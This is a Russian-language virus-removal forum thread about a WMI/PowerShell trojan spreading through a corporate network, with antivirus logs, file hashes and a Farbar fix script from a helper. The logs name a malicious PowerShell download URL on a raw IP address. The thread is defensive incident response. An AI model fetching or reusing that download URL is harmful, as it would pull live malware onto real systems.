Перейти к содержанию
Правила раздела

Заражение корпоративной сети: зловред Trojan.Multi.GenAutorunWMI.с (или .a), он же HEUR:Trojan.Multi.GenAutorunSvc.ksws, он же PowerShellMulDrop.129/PowerShellDownLoader.1452

Burila

От Burila
в Помощь в удалении вирусов

 Share

Рекомендуемые сообщения

Burila Новичок

Burila

Опубликовано
Опубликовано

В корпоративной сети появился и разползся вирус. 


Антивирусы определяют его как:

  • HEUR:Trojan.Multi.GenAutorunSvc.ksws    [Каspersky Security for Windows Server]
  • Trojan.Multi.GenAutorunWMI.a (или .с)    [Kaspersky Cloud на клиентских машинах]
  • PowerShellMulDrop.129 + PowerShellDownLoader.1452    [DrWeb CureIT]

 

Проявления заражения выглядят следующим образом: загрузка процессоров на машинах под 100% процессами schtasks.exe и несколькими powershell.exe.
Заражает машины с Windows 7, Server 2008, Server 2012, как физические, так и виртуальные. Компы с WinXP и Server2003 вирусу пока не интересны.

 

Зараженные машины выявлялись, пролечивались, устанавливался антивирус.
После этого загрузка процессора нормализуется, но, судя по логам антивируса на серверах, зараза продолжает сидеть на машинах. И так же продолжается ее распространение по сетке предприятия.

 

Прошу проконсультировать:
1. Как вывести заразу с серверов (и, возможно, с клиентских машин)
2. Что требуется для предотвращения заражения новых машин и прекращения распространение вируса
3. Если есть какая-то подробная информация по данному зловреду, механизму распространения и действия - с удовольствием ознакомлюсь.

Заранее благодарю.

 

Это была преамбула, теперь более развернутая информация:

 

Сервера:


С их диагностики всё началось, с ними же грустнее всего.
В рамках борьбы с заражением на сервера установлены Каspersky Security for Windows Server 11.0.1.897
После установки, активации, обновления баз и включения KSN запускалась "Проверка важных областей" с настройками "по умолчанию" (Действия над зараженными и другими обнаруженными объектами: Выполнять рекомендуемое действие).
Находилось следующее:

 

Обнаружен объект: Потенциальная уязвимость HEUR:Trojan.Multi.GenAutorunSvc.ksws.
Имя объекта: WMIService:BVMFJGIVCEOAWSUOYQTH 

 

После последующей перезагрузки сервера в диспетчере задач всё выглядит прилично и "лишние" процессы не грузят систему.
Но в "Событиях" задачи "Постоянная защита файлов" постоянно появляются блоки новых записей с пометкой "Уровень важности: Критический".

Получается, дрянь сидит где-то в системе и периодически пытается вылезти в интернет. 
И, возможно, еще что-то делает не такое явное.
Блок сообщений с одного из серверов:

 

Время: 26.08.2021 2:06:54
Обнаружен объект: Потенциальная уязвимость HEUR:Trojan.Multi.GenAutorunWmi.ksws.
Имя объекта: WMI-Consumer:SCM Event8 Log Consumer 

 

Время: 26.08.2021 2:06:55
Обнаружен объект: Потенциальная уязвимость HEUR:Trojan.Multi.GenAutorunWmi.ksws.
Имя объекта: WMI-Consumer:SCM Event8 Log Consumer2 

 

Время: 26.08.2021 2:50:51
Обнаружен веб-адрес.    .
Имя объекта: http://45.10.69.139:8000/in6.ps1
Компьютер: network
Пользователь: KR-TERM\Администратор
Имя процесса: wmiprvse.exe
PID: 3884

 

Время: 26.08.2021 6:55:28
Обнаружен веб-адрес.    .
Имя объекта: http://45.10.69.139:8000/in6.ps1 
Компьютер: network
Пользователь: KR-TERM\Администратор
Имя процесса: wmiprvse.exe
PID: 3884

 

На других серверах дополнительно появляются сообщения с другими пользователями и процессом:

 

Обнаружен веб-адрес.    .
Имя объекта: http://45.10.69.139:8000/in6.ps1
Компьютер: localhost
Пользователь: WORKGROUP\FIL-T2$
Имя процесса: services.exe
PID: 764

 

Процесс терминирован: обнаружена попытка эксплуатации уязвимости. Причина: в защищаемом процессе другой процесс создал поток управления.
Имя объекта: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Компьютер: VIRTUALMACHINE
Пользователь: VIRTUALMACHINE\Администратор
Имя процесса: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

 

Обнаружен объект: Троянская программа Trojan.Win32.Shelma.arzd.
Имя объекта: C:\Windows\System32\mue.exe 
MD5 хеш файла: d1aed5a1726d278d521d320d082c3e1e
Хеш SHA256 файла: 0a1cdc92bbb77c897723f21a376213480fd3484e45bda05aa5958e84a7c2edff
Компьютер: network
Пользователь: VIRTUALMACHINE\Администратор


Клиентские компьютеры:


Если на клиентской машине c windows 7 стоит антивирус Касперского - машина не заражалась.
При отключения Касперского машина заражается.
Kaspersky Cloud в этом случае находит в системной памяти несколько разновидностей вируса: 

  • Trojan.Multi.GenAutorunWMI.a (компьютер 1)
  • Trojan.Multi.GenAutorunReg.c (компьютер 2)

После лечения с перезагрузкой на клиентской машине вроде всё в порядке - в процессах лишнего нет, полная проверка компьютера ничего не находит.

Если на зараженной машине, на которой не стоит антивирус, запустить DrWeb CureIT, то обнаруживаются обычно следующие угрозы (пример с конкретной машины):

 

Объект: powershell.exe
Угроза: PowerShellDownLoader.1452
Путь: \Process\4288\Device\HarddiskVolume2\Windows\System32\WindowsPoweShell\v1.0\powershell.exe

 

Объект: CommandLineTemplate
Угроза: PowerShellMulDrop.129
Путь: \WMI\root\subscription\CommandLineEventConsumer{266c72e5-62e8-11d1-ad89-00c04fd8fdff}\CommandLineTemplate

 

powershell.exe может быть несколько, CommandLineTemplate обычно один.


После пролечивания утилитой DrWeb CureIT "паразитные" процессы исчезают, но через какое-то время снова происходит заражение и последующая загрузка мощностей машины.

 

При подготовке обращения согласно инструкциям перед запуском "Kaspersky Removal Tool" на одном из серверов (Windows Server 2012 R2 Standart) отключил компоненты Каspersky Security for Windows Server "Постоянная защита файлов" и "Защита от сетевых угроз". В диспетчере задач тут же радостно нарисовалась загрузка процессом Powershell, который пришлось завершить вручную.
KVRT обнаружил троянскую программу "Trojan.Multi.GenAutoranReg.c". Выбрал "Лечение с перезагрузкой".

После перезагрузки запустил автоматический сбор логов.

Прикладываю файлы сканирования с сервера.

CollectionLog-2021.08.26-15.38.zip

Ссылка на комментарий
Поделиться на другие сайты
Burila Новичок

Burila

Опубликовано
  • Автор
Опубликовано
3 часа назад, thyrex сказал:

Логи нужно собирать локально за компьютером, а не в терминальной сессии.

В указаниях в теме «Порядок оформления запроса о помощи» я ничего не обнаружил про то, что логи должны собираться обязательно в консольной сессии. 

В представленном логе недостаточно информации? 

Если данный момент критичен - запущу утилиту локально. 

Ссылка на комментарий
Поделиться на другие сайты
thyrex Мудрец

thyrex

Опубликовано
Опубликовано

Лечение в терминальной сессии может привести к непредсказуемым сбоям в работе системы.

Это касается применения любой из утилит, а не конкретно компонентов Autologger.

Ссылка на комментарий
Поделиться на другие сайты
mike 1 Мудрец

mike 1

Опубликовано
Опубликовано
26.08.2021 в 15:56, Burila сказал:

Как вывести заразу с серверов (и, возможно, с клиентских машин)

Если у вас расширенная лицензия Endpoint Security, то как вариант на рабочих станциях так: 

 

image.thumb.png.8c1d2d58a67e558998a9f02ae95eae6e.png

 

Для защиты серверов можно использовать проверку опасных скриптов, либо блочить через контроль программ. Замок только закройте. 

 

  image.thumb.png.eaa3dffd731560cf1355fe9af38bb117.png

Ссылка на комментарий
Поделиться на другие сайты
thyrex Мудрец

thyrex

Опубликовано
Опубликовано

Скачайте Farbar Recovery Scan Tool NAAC5Ba.png и сохраните на Рабочем столе.

  • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.


1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan отмечены List BCD и 90 Days Files.
3munStB.png
3. Нажмите кнопку Scan.
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.
 

Ссылка на комментарий
Поделиться на другие сайты
Burila Новичок

Burila

Опубликовано
  • Автор
Опубликовано
15 часов назад, thyrex сказал:

Скачайте Farbar Recovery Scan Tool NAAC5Ba.png и сохраните на Рабочем столе.

  • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.


1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan отмечены List BCD и 90 Days Files.
3munStB.png
3. Нажмите кнопку Scan.
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.
 

 

FRST-Log-2021.08.28.7z

Ссылка на комментарий
Поделиться на другие сайты
thyrex Мудрец

thyrex

Опубликовано
Опубликовано

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать) 

Start::
CreateRestorePoint:
HKLM\Software\...\AppCompatFlags\Custom\acrord32.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\acrord32.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\brosec.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\brosec.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\browser.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\browser.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\cscript.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\cscript.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\excel.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\excel.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\firefox.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\firefox.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\foxitreader.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\foxitreader.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\iexplore.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\iexplore.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\infopath.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\infopath.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\java-rmi.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\java-rmi.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\javacpl.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\javacpl.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\jjs.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\jjs.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\jp2launcher.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\jp2launcher.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\jusched.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\jusched.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\lync.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\lync.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\msaccess.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\msaccess.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\mshta.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\mshta.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\mspub.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\mspub.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\onenoteim.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\onenoteim.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\onenotem.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\onenotem.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\opera.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\opera.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\outlook.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\outlook.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\plugin-container.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\plugin-container.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\powerpnt.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\powerpnt.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\powershell.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\powershell.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\RdrCEF.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\RdrCEF.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\skype.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\skype.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\skypepm.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\skypepm.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\sway.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\sway.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\winword.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\winword.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\wscript.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\wscript.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\InstalledSDB\{d847be8d-f997-4860-a27c-22085498a593}: [DatabasePath] -> C:\Windows\AppPatch\Custom\Custom64\{d847be8d-f997-4860-a27c-22085498a593}.sdb [2021-08-27]
HKLM\Software\...\AppCompatFlags\InstalledSDB\{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}: [DatabasePath] -> C:\Windows\AppPatch\Custom\{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb [2021-08-27]
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\acrord32.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\acrord32.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\brosec.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\brosec.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\browser.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\browser.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\cscript.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\cscript.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\excel.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\excel.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\firefox.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\firefox.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\foxitreader.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\foxitreader.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\iexplore.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\iexplore.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\infopath.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\infopath.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\java-rmi.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\java-rmi.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\javacpl.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\javacpl.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\jjs.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\jjs.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\jp2launcher.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\jp2launcher.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\jusched.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\jusched.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\lync.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\lync.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\msaccess.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\msaccess.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\mshta.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\mshta.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\mspub.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\mspub.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\onenoteim.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\onenoteim.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\onenotem.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\onenotem.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\opera.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\opera.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\outlook.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\outlook.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\plugin-container.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\plugin-container.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\powerpnt.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\powerpnt.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\powershell.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\powershell.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\RdrCEF.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\RdrCEF.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\skype.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\skype.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\skypepm.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\skypepm.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\sway.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\sway.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\winword.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\winword.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\wscript.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\wscript.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
End::


2. Запустите Farbar Recovery Scan Tool.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

 

  • Обратите внимание: перезагрузку компьютера нужно выполнить вручную после данного скрипта.


 

Ссылка на комментарий
Поделиться на другие сайты
Burila Новичок

Burila

Опубликовано
  • Автор
Опубликовано
7 часов назад, thyrex сказал:

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать) 


Start::
CreateRestorePoint:
HKLM\Software\...\AppCompatFlags\Custom\acrord32.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\acrord32.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\brosec.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\brosec.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
